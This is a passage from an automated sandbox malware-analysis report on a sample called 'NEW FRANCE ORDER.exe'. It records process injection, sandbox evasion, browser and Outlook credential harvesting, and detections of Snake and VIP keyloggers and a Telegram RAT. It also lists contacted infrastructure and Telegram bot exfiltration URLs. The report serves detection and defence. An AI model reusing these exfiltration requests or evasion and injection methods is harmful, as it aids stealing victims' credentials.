Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594578 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594469 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594344 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594234 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594125 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594016 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593906 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593797 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593687 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593578 Jump to behavior
Source: InstallUtil.exe, 00000007.00000002.2419801823.0000000001652000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT<h
Source: IsSingleByte.exe, 0000000A.00000002.1523800985.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen
Source: IsSingleByte.exe, 0000000A.00000002.1523800985.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
Source: InstallUtil.exe, 0000000B.00000002.2419510014.0000000001268000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll="Sy
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000 Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43A000 Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000 Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 100E008 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43A000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C86008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\IsSingleByte.exe "C:\Users\user\AppData\Roaming\IsSingleByte.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Queries volume information: C:\Users\user\Desktop\NEW FRANCE ORDER.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Queries volume information: C:\Users\user\AppData\Roaming\IsSingleByte.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsSingleByte.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NEW FRANCE ORDER.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000007.00000002.2422846155.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2423370342.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NEW FRANCE ORDER.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: IsSingleByte.exe PID: 4508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7476, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2422846155.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2423370342.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NEW FRANCE ORDER.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: IsSingleByte.exe PID: 4508, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NEW FRANCE ORDER.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: IsSingleByte.exe PID: 4508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7476, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000007.00000002.2422846155.0000000003261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2423370342.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NEW FRANCE ORDER.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: IsSingleByte.exe PID: 4508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7476, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 7.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.IsSingleByte.exe.401a820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4583590.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4457d70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NEW FRANCE ORDER.exe.4409550.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1534510906.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2416350744.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1534510906.000000000401A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2422846155.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2423370342.00000000030EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1297862990.0000000004408000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NEW FRANCE ORDER.exe PID: 7812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: IsSingleByte.exe PID: 4508, type: MEMORYSTR
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1650501 Sample: NEW FRANCE ORDER.exe Startdate: 27/03/2025 Architecture: WINDOWS Score: 100 35 reallyfreegeoip.org 2->35 37 api.telegram.org 2->37 39 3 other IPs or domains 2->39 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 51 14 other signatures 2->51 8 wscript.exe 1 2->8         started        11 NEW FRANCE ORDER.exe 5 2->11         started        signatures3 47 Tries to detect the country of the analysis system (by using the IP) 35->47 49 Uses the Telegram API (likely for C&C communication) 37->49 process4 file5 57 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->57 14 IsSingleByte.exe 2 8->14         started        23 C:\Users\user\AppData\...\IsSingleByte.exe, PE32 11->23 dropped 25 C:\Users\user\AppData\...\IsSingleByte.vbs, ASCII 11->25 dropped 27 C:\Users\...\IsSingleByte.exe:Zone.Identifier, ASCII 11->27 dropped 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->59 61 Writes to foreign memory regions 11->61 63 Injects a PE file into a foreign processes 11->63 17 InstallUtil.exe 15 2 11->17         started        signatures6 process7 dnsIp8 65 Antivirus detection for dropped file 14->65 67 Multi AV Scanner detection for dropped file 14->67 69 Writes to foreign memory regions 14->69 71 Injects a PE file into a foreign processes 14->71 20 InstallUtil.exe 2 14->20         started        29 api.telegram.org 149.154.167.220, 443, 49740, 49760 TELEGRAMRU United Kingdom 17->29 31 checkip.dyndns.com 158.101.44.242, 49717, 49726, 49728 ORACLE-BMC-31898US United States 17->31 33 2 other IPs or domains 17->33 73 Tries to steal Mail credentials (via file / registry access) 17->73 signatures9 process10 signatures11 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal browser information (history, passwords, etc) 20->55
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.48.1
 reallyfreegeoip.org United States
13335 CLOUDFLARENETUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
46.175.148.58
 mail.iaa-airferight.com Ukraine
56394 ASLAGIDKOM-NETUA false
158.101.44.242
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false

Contacted Domains

Name IP Active
mail.iaa-airferight.com 46.175.148.58 true
reallyfreegeoip.org 104.21.48.1 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 158.101.44.242 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20and%20Time:%2027/03/2025%20/%2021:07:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20928100%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
    		high
    http://checkip.dyndns.org/ false
      		high
      https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20and%20Time:%2027/03/2025%20/%2022:36:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20928100%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
        		high
        https://reallyfreegeoip.org/xml/45.92.229.138 false
          		high